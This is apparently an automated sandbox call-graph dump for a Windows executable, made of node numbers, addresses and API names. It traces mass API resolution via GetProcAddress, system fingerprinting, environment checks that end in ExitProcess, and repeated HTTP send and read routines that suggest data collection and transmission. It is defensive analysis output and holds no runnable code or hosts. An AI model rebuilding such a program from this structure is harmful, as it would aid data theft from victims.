2 API calls 14190->14191 14192 5434ab 14191->14192 14193 5445c0 2 API calls 14192->14193 14194 5434c4 14193->14194 14195 5445c0 2 API calls 14194->14195 14196 5434dd 14195->14196 14197 5445c0 2 API calls 14196->14197 14198 5434f6 14197->14198 14199 5445c0 2 API calls 14198->14199 14200 54350f 14199->14200 14201 5445c0 2 API calls 14200->14201 14202 543528 14201->14202 14203 5445c0 2 API calls 14202->14203 14204 543541 14203->14204 14205 5445c0 2 API calls 14204->14205 14206 54355a 14205->14206 14207 5445c0 2 API calls 14206->14207 14208 543573 14207->14208 14209 5445c0 2 API calls 14208->14209 14210 54358c 14209->14210 14211 5445c0 2 API calls 14210->14211 14212 5435a5 14211->14212 14213 5445c0 2 API calls 14212->14213 14214 5435be 14213->14214 14215 5445c0 2 API calls 14214->14215 14216 5435d7 14215->14216 14217 5445c0 2 API calls 14216->14217 14218 5435f0 14217->14218 14219 5445c0 2 API calls 14218->14219 14220 543609 14219->14220 14221 5445c0 2 API calls 14220->14221 14222 543622 14221->14222 14223 5445c0 2 API calls 14222->14223 14224 54363b 14223->14224 14225 5445c0 2 API calls 14224->14225 14226 543654 14225->14226 14227 5445c0 2 API calls 14226->14227 14228 54366d 14227->14228 14229 5445c0 2 API calls 14228->14229 14230 543686 14229->14230 14231 5445c0 2 API calls 14230->14231 14232 54369f 14231->14232 14233 5445c0 2 API calls 14232->14233 14234 5436b8 14233->14234 14235 5445c0 2 API calls 14234->14235 14236 5436d1 14235->14236 14237 5445c0 2 API calls 14236->14237 14238 5436ea 14237->14238 14239 5445c0 2 API calls 14238->14239 14240 543703 14239->14240 14241 5445c0 2 API calls 14240->14241 14242 54371c 14241->14242 14243 5445c0 2 API calls 14242->14243 14244 543735 14243->14244 14245 5445c0 2 API calls 14244->14245 14246 54374e 14245->14246 14247 5445c0 2 API calls 14246->14247 14248 543767 14247->14248 14249 5445c0 2 API calls 14248->14249 14250 543780 14249->14250 14251 5445c0 2 API calls 14250->14251 14252 543799 14251->14252 14253 5445c0 2 API calls 14252->14253 14254 5437b2 14253->14254 14255 5445c0 2 API calls 14254->14255 14256 5437cb 14255->14256 14257 5445c0 2 API calls 14256->14257 14258 5437e4 14257->14258 14259 5445c0 2 API calls 14258->14259 14260 5437fd 14259->14260 14261 5445c0 2 API calls 14260->14261 14262 543816 14261->14262 14263 5445c0 2 API calls 14262->14263 14264 54382f 14263->14264 14265 5445c0 2 API calls 14264->14265 14266 543848 14265->14266 14267 5445c0 2 API calls 14266->14267 14268 543861 14267->14268 14269 5445c0 2 API calls 14268->14269 14270 54387a 14269->14270 14271 5445c0 2 API calls 14270->14271 14272 543893 14271->14272 14273 5445c0 2 API calls 14272->14273 14274 5438ac 14273->14274 14275 5445c0 2 API calls 14274->14275 14276 5438c5 14275->14276 14277 5445c0 2 API calls 14276->14277 14278 5438de 14277->14278 14279 5445c0 2 API calls 14278->14279 14280 5438f7 14279->14280 14281 5445c0 2 API calls 14280->14281 14282 543910 14281->14282 14283 5445c0 2 API calls 14282->14283 14284 543929 14283->14284 14285 5445c0 2 API calls 14284->14285 14286 543942 14285->14286 14287 5445c0 2 API calls 14286->14287 14288 54395b 14287->14288 14289 5445c0 2 API calls 14288->14289 14290 543974 14289->14290 14291 5445c0 2 API calls 14290->14291 14292 54398d 14291->14292 14293 5445c0 2 API calls 14292->14293 14294 5439a6 14293->14294 14295 5445c0 2 API calls 14294->14295 14296 5439bf 14295->14296 14297 5445c0 2 API calls 14296->14297 14298 5439d8 14297->14298 14299 5445c0 2 API calls 14298->14299 14300 5439f1 14299->14300 14301 5445c0 2 API calls 14300->14301 14302 543a0a 14301->14302 14303 5445c0 2 API calls 14302->14303 14304 543a23 14303->14304 14305 5445c0 2 API calls 14304->14305 14306 543a3c 14305->14306 14307 5445c0 2 API calls 14306->14307 14308 543a55 14307->14308 14309 5445c0 2 API calls 14308->14309 14310 543a6e 14309->14310 14311 5445c0 2 API calls 14310->14311 14312 543a87 14311->14312 14313 5445c0 2 API calls 14312->14313 14314 543aa0 14313->14314 14315 5445c0 2 API calls 14314->14315 14316 543ab9 14315->14316 14317 5445c0 2 API calls 14316->14317 14318 543ad2 14317->14318 14319 5445c0 2 API calls 14318->14319 14320 543aeb 14319->14320 14321 5445c0 2 API calls 14320->14321 14322 543b04 14321->14322 14323 5445c0 2 API calls 14322->14323 14324 543b1d 14323->14324 14325 5445c0 2 API calls 14324->14325 14326 543b36 14325->14326 14327 5445c0 2 API calls 14326->14327 14328 543b4f 14327->14328 14329 5445c0 2 API calls 14328->14329 14330 543b68 14329->14330 14331 5445c0 2 API calls 14330->14331 14332 543b81 14331->14332 14333 5445c0 2 API calls 14332->14333 14334 543b9a 14333->14334 14335 5445c0 2 API calls 14334->14335 14336 543bb3 14335->14336 14337 5445c0 2 API calls 14336->14337 14338 543bcc 14337->14338 14339 5445c0 2 API calls 14338->14339 14340 543be5 14339->14340 14341 5445c0 2 API calls 14340->14341 14342 543bfe 14341->14342 14343 5445c0 2 API calls 14342->14343 14344 543c17 14343->14344 14345 5445c0 2 API calls 14344->14345 14346 543c30 14345->14346 14347 5445c0 2 API calls 14346->14347 14348 543c49 14347->14348 14349 5445c0 2 API calls 14348->14349 14350 543c62 14349->14350 14351 5445c0 2 API calls 14350->14351 14352 543c7b 14351->14352 14353 5445c0 2 API calls 14352->14353 14354 543c94 14353->14354 14355 5445c0 2 API calls 14354->14355 14356 543cad 14355->14356 14357 5445c0 2 API calls 14356->14357 14358 543cc6 14357->14358 14359 5445c0 2 API calls 14358->14359 14360 543cdf 14359->14360 14361 5445c0 2 API calls 14360->14361 14362 543cf8 14361->14362 14363 5445c0 2 API calls 14362->14363 14364 543d11 14363->14364 14365 5445c0 2 API calls 14364->14365 14366 543d2a 14365->14366 14367 5445c0 2 API calls 14366->14367 14368 543d43 14367->14368 14369 5445c0 2 API calls 14368->14369 14370 543d5c 14369->14370 14371 5445c0 2 API calls 14370->14371 14372 543d75 14371->14372 14373 5445c0 2 API calls 14372->14373 14374 543d8e 14373->14374 14375 5445c0 2 API calls 14374->14375 14376 543da7 14375->14376 14377 5445c0 2 API calls 14376->14377 14378 543dc0 14377->14378 14379 5445c0 2 API calls 14378->14379 14380 543dd9 14379->14380 14381 5445c0 2 API calls 14380->14381 14382 543df2 14381->14382 14383 5445c0 2 API calls 14382->14383 14384 543e0b 14383->14384 14385 5445c0 2 API calls 14384->14385 14386 543e24 14385->14386 14387 5445c0 2 API calls 14386->14387 14388 543e3d 14387->14388 14389 5445c0 2 API calls 14388->14389 14390 543e56 14389->14390 14391 5445c0 2 API calls 14390->14391 14392 543e6f 14391->14392 14393 5445c0 2 API calls 14392->14393 14394 543e88 14393->14394 14395 5445c0 2 API calls 14394->14395 14396 543ea1 14395->14396 14397 5445c0 2 API calls 14396->14397 14398 543eba 14397->14398 14399 5445c0 2 API calls 14398->14399 14400 543ed3 14399->14400 14401 5445c0 2 API calls 14400->14401 14402 543eec 14401->14402 14403 5445c0 2 API calls 14402->14403 14404 543f05 14403->14404 14405 5445c0 2 API calls 14404->14405 14406 543f1e 14405->14406 14407 5445c0 2 API calls 14406->14407 14408 543f37 14407->14408 14409 5445c0 2 API calls 14408->14409 14410 543f50 14409->14410 14411 5445c0 2 API calls 14410->14411 14412 543f69 14411->14412 14413 5445c0 2 API calls 14412->14413 14414 543f82 14413->14414 14415 5445c0 2 API calls 14414->14415 14416 543f9b 14415->14416 14417 5445c0 2 API calls 14416->14417 14418 543fb4 14417->14418 14419 5445c0 2 API calls 14418->14419 14420 543fcd 14419->14420 14421 5445c0 2 API calls 14420->14421 14422 543fe6 14421->14422 14423 5445c0 2 API calls 14422->14423 14424 543fff 14423->14424 14425 5445c0 2 API calls 14424->14425 14426 544018 14425->14426 14427 5445c0 2 API calls 14426->14427 14428 544031 14427->14428 14429 5445c0 2 API calls 14428->14429 14430 54404a 14429->14430 14431 5445c0 2 API calls 14430->14431 14432 544063 14431->14432 14433 5445c0 2 API calls 14432->14433 14434 54407c 14433->14434 14435 5445c0 2 API calls 14434->14435 14436 544095 14435->14436 14437 5445c0 2 API calls 14436->14437 14438 5440ae 14437->14438 14439 5445c0 2 API calls 14438->14439 14440 5440c7 14439->14440 14441 5445c0 2 API calls 14440->14441 14442 5440e0 14441->14442 14443 5445c0 2 API calls 14442->14443 14444 5440f9 14443->14444 14445 5445c0 2 API calls 14444->14445 14446 544112 14445->14446 14447 5445c0 2 API calls 14446->14447 14448 54412b 14447->14448 14449 5445c0 2 API calls 14448->14449 14450 544144 14449->14450 14451 5445c0 2 API calls 14450->14451 14452 54415d 14451->14452 14453 5445c0 2 API calls 14452->14453 14454 544176 14453->14454 14455 5445c0 2 API calls 14454->14455 14456 54418f 14455->14456 14457 5445c0 2 API calls 14456->14457 14458 5441a8 14457->14458 14459 5445c0 2 API calls 14458->14459 14460 5441c1 14459->14460 14461 5445c0 2 API calls 14460->14461 14462 5441da 14461->14462 14463 5445c0 2 API calls 14462->14463 14464 5441f3 14463->14464 14465 5445c0 2 API calls 14464->14465 14466 54420c 14465->14466 14467 5445c0 2 API calls 14466->14467 14468 544225 14467->14468 14469 5445c0 2 API calls 14468->14469 14470 54423e 14469->14470 14471 5445c0 2 API calls 14470->14471 14472 544257 14471->14472 14473 5445c0 2 API calls 14472->14473 14474 544270 14473->14474 14475 5445c0 2 API calls 14474->14475 14476 544289 14475->14476 14477 5445c0 2 API calls 14476->14477 14478 5442a2 14477->14478 14479 5445c0 2 API calls 14478->14479 14480 5442bb 14479->14480 14481 5445c0 2 API calls 14480->14481 14482 5442d4 14481->14482 14483 5445c0 2 API calls 14482->14483 14484 5442ed 14483->14484 14485 5445c0 2 API calls 14484->14485 14486 544306 14485->14486 14487 5445c0 2 API calls 14486->14487 14488 54431f 14487->14488 14489 5445c0 2 API calls 14488->14489 14490 544338 14489->14490 14491 5445c0 2 API calls 14490->14491 14492 544351 14491->14492 14493 5445c0 2 API calls 14492->14493 14494 54436a 14493->14494 14495 5445c0 2 API calls 14494->14495 14496 544383 14495->14496 14497 5445c0 2 API calls 14496->14497 14498 54439c 14497->14498 14499 5445c0 2 API calls 14498->14499 14500 5443b5 14499->14500 14501 5445c0 2 API calls 14500->14501 14502 5443ce 14501->14502 14503 5445c0 2 API calls 14502->14503 14504 5443e7 14503->14504 14505 5445c0 2 API calls 14504->14505 14506 544400 14505->14506 14507 5445c0 2 API calls 14506->14507 14508 544419 14507->14508 14509 5445c0 2 API calls 14508->14509 14510 544432 14509->14510 14511 5445c0 2 API calls 14510->14511 14512 54444b 14511->14512 14513 5445c0 2 API calls 14512->14513 14514 544464 14513->14514 14515 5445c0 2 API calls 14514->14515 14516 54447d 14515->14516 14517 5445c0 2 API calls 14516->14517 14518 544496 14517->14518 14519 5445c0 2 API calls 14518->14519 14520 5444af 14519->14520 14521 5445c0 2 API calls 14520->14521 14522 5444c8 14521->14522 14523 5445c0 2 API calls 14522->14523 14524 5444e1 14523->14524 14525 5445c0 2 API calls 14524->14525 14526 5444fa 14525->14526 14527 5445c0 2 API calls 14526->14527 14528 544513 14527->14528 14529 5445c0 2 API calls 14528->14529 14530 54452c 14529->14530 14531 5445c0 2 API calls 14530->14531 14532 544545 14531->14532 14533 5445c0 2 API calls 14532->14533 14534 54455e 14533->14534 14535 5445c0 2 API calls 14534->14535 14536 544577 14535->14536 14537 5445c0 2 API calls 14536->14537 14538 544590 14537->14538 14539 5445c0 2 API calls 14538->14539 14540 5445a9 14539->14540 14541 559c10 14540->14541 14542 55a036 8 API calls 14541->14542 14543 559c20 43 API calls 14541->14543 14544 55a146 14542->14544 14545 55a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 55a216 14544->14546 14547 55a153 8 API calls 14544->14547 14545->14544 14548 55a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14548 14549 55a298 14546->14549 14547->14546 14548->14549 14550 55a2a5 6 API calls 14549->14550 14551 55a337 14549->14551 14550->14551 14552 55a344 9 API calls 14551->14552 14553 55a41f 14551->14553 14552->14553 14554 55a4a2 14553->14554 14555 55a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14553->14555 14556 55a4dc 14554->14556 14557 55a4ab GetProcAddress GetProcAddress 14554->14557 14555->14554 14558 55a515 14556->14558 14559 55a4e5 GetProcAddress GetProcAddress 14556->14559 14557->14556 14560 55a612 14558->14560 14561 55a522 10 API calls 14558->14561 14559->14558 14562 55a67d 14560->14562 14563 55a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14560->14563 14561->14560 14564 55a686 GetProcAddress 14562->14564 14565 55a69e 14562->14565 14563->14562 14564->14565 14566 55a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14566 14567 555ca3 14565->14567 14566->14567 14568 541590 14567->14568 15687 541670 14568->15687 14571 55a7a0 lstrcpy 14572 5415b5 14571->14572 14573 55a7a0 lstrcpy 14572->14573 14574 5415c7 14573->14574 14575 55a7a0 lstrcpy 14574->14575 14576 5415d9 14575->14576 14577 55a7a0 lstrcpy 14576->14577 14578 541663 14577->14578 14579 555510 14578->14579 14580 555521 14579->14580 14581 55a820 2 API calls 14580->14581 14582 55552e 14581->14582 14583 55a820 2 API calls 14582->14583 14584 55553b 14583->14584 14585 55a820 2 API calls 14584->14585 14586 555548 14585->14586 14587 55a740 lstrcpy 14586->14587 14588 555555 14587->14588 14589 55a740 lstrcpy 14588->14589 14590 555562 14589->14590 14591 55a740 lstrcpy 14590->14591 14592 55556f 14591->14592 14593 55a740 lstrcpy 14592->14593 14633 55557c 14593->14633 14594 555643 StrCmpCA 14594->14633 14595 5556a0 StrCmpCA 14596 5557dc 14595->14596 14595->14633 14597 55a8a0 lstrcpy 14596->14597 14599 5557e8 14597->14599 14598 541590 lstrcpy 14598->14633 14601 55a820 2 API calls 14599->14601 14600 55a820 lstrlen lstrcpy 14600->14633 14602 5557f6 14601->14602 14604 55a820 2 API calls 14602->14604 14603 555856 StrCmpCA 14605 555991 14603->14605 14603->14633 14608 555805 14604->14608 14609 55a8a0 lstrcpy 14605->14609 14606 55a740 lstrcpy 14606->14633 14607 55a7a0 lstrcpy 14607->14633 14610 541670 lstrcpy 14608->14610 14611 55599d 14609->14611 14631 555811 14610->14631 14612 55a820 2 API calls 14611->14612 14613 5559ab 14612->14613 14616 55a820 2 API calls 14613->14616 14614 555a0b StrCmpCA 14617 555a16 Sleep 14614->14617 14618 555a28 14614->14618 14615 5551f0 20 API calls 14615->14633 14619 5559ba 14616->14619 14617->14633 14620 55a8a0 lstrcpy 14618->14620 14621 541670 lstrcpy 14619->14621 14622 555a34 14620->14622 14621->14631 14623 55a820 2 API calls 14622->14623 14624 555a43 14623->14624 14626 55a820 2 API calls 14624->14626 14625 5552c0 25 API calls 14625->14633 14628 555a52 14626->14628 14627 55578a StrCmpCA 14627->14633 14630 541670 lstrcpy 14628->14630 14629 55a8a0 lstrcpy 14629->14633 14630->14631 14631->13686 14632 55593f StrCmpCA 14632->14633 14633->14594 14633->14595 14633->14598 14633->14600 14633->14603 14633->14606 14633->14607 14633->14614 14633->14615 14633->14625 14633->14627 14633->14629 14633->14632 14635 557553 GetVolumeInformationA 14634->14635 14636 55754c 14634->14636 14637 557591 14635->14637 14636->14635 14638 5575fc GetProcessHeap RtlAllocateHeap 14637->14638 14639 557619 14638->14639 14640 557628 wsprintfA 14638->14640 14641 55a740 lstrcpy 14639->14641 14642 55a740 lstrcpy 14640->14642 14643 555da7 14641->14643 14642->14643 14643->13707 14645 55a7a0 lstrcpy 14644->14645 14646 544899 14645->14646 15696 5447b0 14646->15696 14648 5448a5 14649 55a740 lstrcpy 14648->14649 14650 5448d7 14649->14650 14651 55a740 lstrcpy 14650->14651 14652 5448e4 14651->14652 14653 55a740 lstrcpy 14652->14653 14654 5448f1 14653->14654 14655 55a740 lstrcpy 14654->14655 14656 5448fe 14655->14656 14657 55a740 lstrcpy 14656->14657 14658 54490b InternetOpenA StrCmpCA 14657->14658 14659 544944 14658->14659 14660 544ecb InternetCloseHandle 14659->14660 15702 558b60 14659->15702 14662 544ee8 14660->14662 15717 549ac0 CryptStringToBinaryA 14662->15717 14663 544963 15710 55a920 14663->15710 14666 544976 14668 55a8a0 lstrcpy 14666->14668 14673 54497f 14668->14673 14669 55a820 2 API calls 14670 544f05 14669->14670 14672 55a9b0 4 API calls 14670->14672 14671 544f27 ctype 14675 55a7a0 lstrcpy 14671->14675 14674 544f1b 14672->14674 14677 55a9b0 4 API calls 14673->14677 14676 55a8a0 lstrcpy 14674->14676 14688 544f57 14675->14688 14676->14671 14678 5449a9 14677->14678 14679 55a8a0 lstrcpy 14678->14679 14680 5449b2 14679->14680 14681 55a9b0 4 API calls 14680->14681 14682 5449d1 14681->14682 14683 55a8a0 lstrcpy 14682->14683 14684 5449da 14683->14684 14685 55a920 3 API calls 14684->14685 14686 5449f8 14685->14686 14687 55a8a0 lstrcpy 14686->14687 14689 544a01 14687->14689 14688->13710 14690 55a9b0 4 API calls 14689->14690 14691 544a20 14690->14691 14692 55a8a0 lstrcpy 14691->14692 14693 544a29 14692->14693 14694 55a9b0 4 API calls 14693->14694 14695 544a48 14694->14695 14696 55a8a0 lstrcpy 14695->14696 14697 544a51 14696->14697 14698 55a9b0 4 API calls 14697->14698 14699 544a7d 14698->14699 14700 55a920 3 API calls 14699->14700 14701 544a84 14700->14701 14702 55a8a0 lstrcpy 14701->14702 14703 544a8d 14702->14703 14704 544aa3 InternetConnectA 14703->14704 14704->14660 14705 544ad3 HttpOpenRequestA 14704->14705 14707 544ebe InternetCloseHandle 14705->14707 14708 544b28 14705->14708 14707->14660 14709 55a9b0 4 API calls 14708->14709 14710 544b3c 14709->14710 14711 55a8a0 lstrcpy 14710->14711 14712 544b45 14711->14712 14713 55a920 3 API calls 14712->14713 14714 544b63 14713->14714 14715 55a8a0 lstrcpy 14714->14715 14716 544b6c 14715->14716 14717 55a9b0 4 API calls 14716->14717 14718 544b8b 14717->14718 14719 55a8a0 lstrcpy 14718->14719 14720 544b94 14719->14720 14721 55a9b0 4 API calls 14720->14721 14722 544bb5 14721->14722 14723 55a8a0 lstrcpy 14722->14723 14724 544bbe 14723->14724 14725 55a9b0 4 API calls 14724->14725 14726 544bde 14725->14726 14727 55a8a0 lstrcpy 14726->14727 14728 544be7 14727->14728 14729 55a9b0 4 API calls 14728->14729 14730 544c06 14729->14730 14731 55a8a0 lstrcpy 14730->14731 14732 544c0f 14731->14732 14733 55a920 3 API calls 14732->14733 14734 544c2d 14733->14734 14735 55a8a0 lstrcpy 14734->14735 14736 544c36 14735->14736 14737 55a9b0 4 API calls 14736->14737 14738 544c55 14737->14738 14739 55a8a0 lstrcpy 14738->14739 14740 544c5e 14739->14740 14741 55a9b0 4 API calls 14740->14741 14742 544c7d 14741->14742 14743 55a8a0 lstrcpy 14742->14743 14744 544c86 14743->14744 14745 55a920 3 API calls 14744->14745 14746 544ca4 14745->14746 14747 55a8a0 lstrcpy 14746->14747 14748 544cad 14747->14748 14749 55a9b0 4 API calls 14748->14749 14750 544ccc 14749->14750 14751 55a8a0 lstrcpy 14750->14751 14752 544cd5 14751->14752 14753 55a9b0 4 API calls 14752->14753 14754 544cf6 14753->14754 14755 55a8a0 lstrcpy 14754->14755 14756 544cff 14755->14756 14757 55a9b0 4 API calls 14756->14757 14758 544d1f 14757->14758 14759 55a8a0 lstrcpy 14758->14759 14760 544d28 14759->14760 14761 55a9b0 4 API calls 14760->14761 14762 544d47 14761->14762 14763 55a8a0 lstrcpy 14762->14763 14764 544d50 14763->14764 14765 55a920 3 API calls 14764->14765 14766 544d6e 14765->14766 14767 55a8a0 lstrcpy 14766->14767 14768 544d77 14767->14768 14769 55a740 lstrcpy 14768->14769 14770 544d92 14769->14770 14771 55a920 3 API calls 14770->14771 14772 544db3 14771->14772 14773 55a920 3 API calls 14772->14773 14774 544dba 14773->14774 14775 55a8a0 lstrcpy 14774->14775 14776 544dc6 14775->14776 14777 544de7 lstrlen 14776->14777 14778 544dfa 14777->14778 14779 544e03 lstrlen 14778->14779 15716 55aad0 14779->15716 14781 544e13 HttpSendRequestA 14782 544e32 InternetReadFile 14781->14782 14783 544e67 InternetCloseHandle 14782->14783 14788 544e5e 14782->14788 14785 55a800 14783->14785 14785->14707 14786 55a9b0 4 API calls 14786->14788 14787 55a8a0 lstrcpy 14787->14788 14788->14782 14788->14783 14788->14786 14788->14787 15723 55aad0 14789->15723 14791 5517c4 StrCmpCA 14792 5517d7 14791->14792 14793 5517cf ExitProcess 14791->14793 14794 5518f1 StrCmpCA 14792->14794 14795 551951 StrCmpCA 14792->14795 14796 551970 StrCmpCA 14792->14796 14797 551913 StrCmpCA 14792->14797 14798 551932 StrCmpCA 14792->14798 14799 55185d StrCmpCA 14792->14799 14800 55187f StrCmpCA 14792->14800 14801 5518ad StrCmpCA 14792->14801 14802 5518cf StrCmpCA 14792->14802 14803 5519c2 14792->14803 14804 55a820 lstrlen lstrcpy 14792->14804 14794->14792 14795->14792 14796->14792 14797->14792 14798->14792 14799->14792 14800->14792 14801->14792 14802->14792 14803->13712 14804->14792 14806 55a7a0 lstrcpy 14805->14806 14807 545979 14806->14807 14808 5447b0 2 API calls 14807->14808 14809 545985 14808->14809 14810 55a740 lstrcpy 14809->14810 14811 5459ba 14810->14811 14812 55a740 lstrcpy 14811->14812 14813 5459c7 14812->14813 14814 55a740 lstrcpy 14813->14814 14815 5459d4 14814->14815 14816 55a740 lstrcpy 14815->14816 14817 5459e1 14816->14817 14818 55a740 lstrcpy 14817->14818 14819 5459ee InternetOpenA StrCmpCA 14818->14819 14820 545a1d 14819->14820 14821 545fc3 InternetCloseHandle 14820->14821 14822 558b60 3 API calls 14820->14822 14823 545fe0 14821->14823 14824 545a3c 14822->14824 14825 549ac0 4 API calls 14823->14825 14826 55a920 3 API calls 14824->14826 14827 545fe6 14825->14827 14828 545a4f 14826->14828 14830 55a820 2 API calls 14827->14830 14833 54601f ctype 14827->14833 14829 55a8a0 lstrcpy 14828->14829 14834 545a58 14829->14834 14831 545ffd 14830->14831 14832 55a9b0 4 API calls 14831->14832 14835 546013 14832->14835 14836 55a7a0 lstrcpy 14833->14836 14838 55a9b0 4 API calls 14834->14838 14837 55a8a0 lstrcpy 14835->14837 14847 54604f 14836->14847 14837->14833 14839 545a82 14838->14839 14840 55a8a0 lstrcpy 14839->14840 14841 545a8b 14840->14841 14842 55a9b0 4 API calls 14841->14842 14843 545aaa 14842->14843 14844 55a8a0 lstrcpy 14843->14844 14845 545ab3 14844->14845 14846 55a920 3 API calls 14845->14846 14848 545ad1 14846->14848 14847->13718 14849 55a8a0 lstrcpy 14848->14849 14850 545ada 14849->14850 14851 55a9b0 4 API calls 14850->14851 14852 545af9 14851->14852 14853 55a8a0 lstrcpy 14852->14853 14854 545b02 14853->14854 14855 55a9b0 4 API calls 14854->14855 14856 545b21 14855->14856 14857 55a8a0 lstrcpy 14856->14857 14858 545b2a 14857->14858 14859 55a9b0 4 API calls 14858->14859 14860 545b56 14859->14860 14861 55a920 3 API calls 14860->14861 14862 545b5d 14861->14862 14863 55a8a0 lstrcpy 14862->14863 14864 545b66 14863->14864 14865 545b7c InternetConnectA 14864->14865 14865->14821 14866 545bac HttpOpenRequestA 14865->14866 14868 545fb6 InternetCloseHandle 14866->14868 14869 545c0b 14866->14869 14868->14821 14870 55a9b0 4 API calls 14869->14870 14871 545c1f 14870->14871 14872 55a8a0 lstrcpy 14871->14872 14873 545c28 14872->14873 14874 55a920 3 API calls 14873->14874 14875 545c46 14874->14875 14876 55a8a0 lstrcpy 14875->14876 14877 545c4f 14876->14877 14878 55a9b0 4 API calls 14877->14878 14879 545c6e 14878->14879 14880 55a8a0 lstrcpy 14879->14880 14881 545c77 14880->14881 14882 55a9b0 4 API calls 14881->14882 14883 545c98 14882->14883 14884 55a8a0 lstrcpy 14883->14884 14885 545ca1 14884->14885 14886 55a9b0 4 API calls 14885->14886 14887 545cc1 14886->14887 14888 55a8a0 lstrcpy 14887->14888 14889 545cca 14888->14889 14890 55a9b0 4 API calls 14889->14890 14891 545ce9 14890->14891 14892 55a8a0 lstrcpy 14891->14892 14893 545cf2 14892->14893 14894 55a920 3 API calls 14893->14894 14895 545d10 14894->14895 14896 55a8a0 lstrcpy 14895->14896 14897 545d19 14896->14897 14898 55a9b0 4 API calls 14897->14898 14899 545d38 14898->14899 14900 55a8a0 lstrcpy 14899->14900 14901 545d41 14900->14901 14902 55a9b0 4 API calls 14901->14902 14903 545d60 14902->14903 14904 55a8a0 lstrcpy 14903->14904 14905 545d69 14904->14905 14906 55a920 3 API calls 14905->14906 14907 545d87 14906->14907 14908 55a8a0 lstrcpy 14907->14908 14909 545d90 14908->14909 14910 55a9b0 4 API calls 14909->14910 14911 545daf 14910->14911 14912 55a8a0 lstrcpy 14911->14912 14913 545db8 14912->14913 14914 55a9b0 4 API calls 14913->14914 14915 545dd9 14914->14915 14916 55a8a0 lstrcpy 14915->14916 14917 545de2 14916->14917 14918 55a9b0 4 API calls 14917->14918 14919 545e02 14918->14919 14920 55a8a0 lstrcpy 14919->14920 14921 545e0b 14920->14921 14922 55a9b0 4 API calls 14921->14922 14923 545e2a 14922->14923 14924 55a8a0 lstrcpy 14923->14924 14925 545e33 14924->14925 14926 55a920 3 API calls 14925->14926 14927 545e54 14926->14927 14928 55a8a0 lstrcpy 14927->14928 14929 545e5d 14928->14929 14930 545e70 lstrlen 14929->14930 15724 55aad0 14930->15724 14932 545e81 lstrlen GetProcessHeap RtlAllocateHeap 15725 55aad0 14932->15725 14934 545eae lstrlen 14935 545ebe 14934->14935 14936 545ed7 lstrlen 14935->14936 14937 545ee7 14936->14937 14938 545ef0 lstrlen 14937->14938 14939 545f03 14938->14939 14940 545f1a lstrlen 14939->14940 15726 55aad0 14940->15726 14942 545f2a HttpSendRequestA 14943 545f35 InternetReadFile 14942->14943 14944 545f6a InternetCloseHandle 14943->14944 14948 545f61 14943->14948 14944->14868 14946 55a9b0 4 API calls 14946->14948 14947 55a8a0 lstrcpy 14947->14948 14948->14943 14948->14944 14948->14946 14948->14947 14951 551077 14949->14951 14950 551151 14950->13720 14951->14950 14952 55a820 lstrlen lstrcpy 14951->14952 14952->14951 14958 550db7 14953->14958 14954 550f17 14954->13728 14955 550ea4 StrCmpCA 14955->14958 14956 550e27 StrCmpCA 14956->14958 14957 550e67 StrCmpCA 14957->14958 14958->14954 14958->14955 14958->14956 14958->14957 14959 55a820 lstrlen lstrcpy 14958->14959 14959->14958 14963 550f67 14960->14963 14961 551044 14961->13736 14962 550fb2 StrCmpCA 14962->14963 14963->14961 14963->14962 14964 55a820 lstrlen lstrcpy 14963->14964 14964->14963 14966 55a740 lstrcpy 14965->14966 14967 551a26 14966->14967 14968 55a9b0 4 API calls 14967->14968 14969 551a37 14968->14969 14970 55a8a0 lstrcpy 14969->14970 14971 551a40 14970->14971 14972 55a9b0 4 API calls 14971->14972 14973 551a5b 14972->14973 14974 55a8a0 lstrcpy 14973->14974 14975 551a64 14974->14975 14976 55a9b0 4 API calls 14975->14976 14977 551a7d 14976->14977 14978 55a8a0 lstrcpy 14977->14978 14979 551a86 14978->14979 14980 55a9b0 4 API calls 14979->14980 14981 551aa1 14980->14981 14982 55a8a0 lstrcpy 14981->14982 14983 551aaa 14982->14983 14984 55a9b0 4 API calls 14983->14984 14985 551ac3 14984->14985 14986 55a8a0 lstrcpy 14985->14986 14987 551acc 14986->14987 14988 55a9b0 4 API calls 14987->14988 14989 551ae7 14988->14989 14990 55a8a0 lstrcpy 14989->14990 14991 551af0 14990->14991 14992 55a9b0 4 API calls 14991->14992 14993 551b09 14992->14993 14994 55a8a0 lstrcpy 14993->14994 14995 551b12 14994->14995 14996 55a9b0 4 API calls 14995->14996 14997 551b2d 14996->14997 14998 55a8a0 lstrcpy 14997->14998 14999 551b36 14998->14999 15000 55a9b0 4 API calls 14999->15000 15001 551b4f 15000->15001 15002 55a8a0 lstrcpy 15001->15002 15003 551b58 15002->15003 15004 55a9b0 4 API calls 15003->15004 15005 551b76 15004->15005 15006 55a8a0 lstrcpy 15005->15006 15007 551b7f 15006->15007 15008 557500 6 API calls 15007->15008 15009 551b96 15008->15009 15010 55a920 3 API calls 15009->15010 15011 551ba9 15010->15011 15012 55a8a0 lstrcpy 15011->15012 15013 551bb2 15012->15013 15014 55a9b0 4 API calls 15013->15014 15015 551bdc 15014->15015 15016 55a8a0 lstrcpy 15015->15016 15017 551be5 15016->15017 15018 55a9b0 4 API calls 15017->15018 15019 551c05 15018->15019 15020 55a8a0 lstrcpy 15019->15020 15021 551c0e 15020->15021 15727 557690 GetProcessHeap RtlAllocateHeap 15021->15727 15024 55a9b0 4 API calls 15025 551c2e 15024->15025 15026 55a8a0 lstrcpy 15025->15026 15027 551c37 15026->15027 15028 55a9b0 4 API calls 15027->15028 15029 551c56 15028->15029 15030 55a8a0 lstrcpy 15029->15030 15031 551c5f 15030->15031 15032 55a9b0 4 API calls 15031->15032 15033 551c80 15032->15033 15034 55a8a0 lstrcpy 15033->15034 15035 551c89 15034->15035 15734 5577c0 GetCurrentProcess IsWow64Process 15035->15734 15038 55a9b0 4 API calls 15039 551ca9 15038->15039 15040 55a8a0 lstrcpy 15039->15040 15041 551cb2 15040->15041 15042 55a9b0 4 API calls 15041->15042 15043 551cd1 15042->15043 15044 55a8a0 lstrcpy 15043->15044 15045 551cda 15044->15045 15046 55a9b0 4 API calls 15045->15046 15047 551cfb 15046->15047 15048 55a8a0 lstrcpy 15047->15048 15049 551d04 15048->15049 15050 557850 3 API calls 15049->15050 15051 551d14 15050->15051 15052 55a9b0 4 API calls 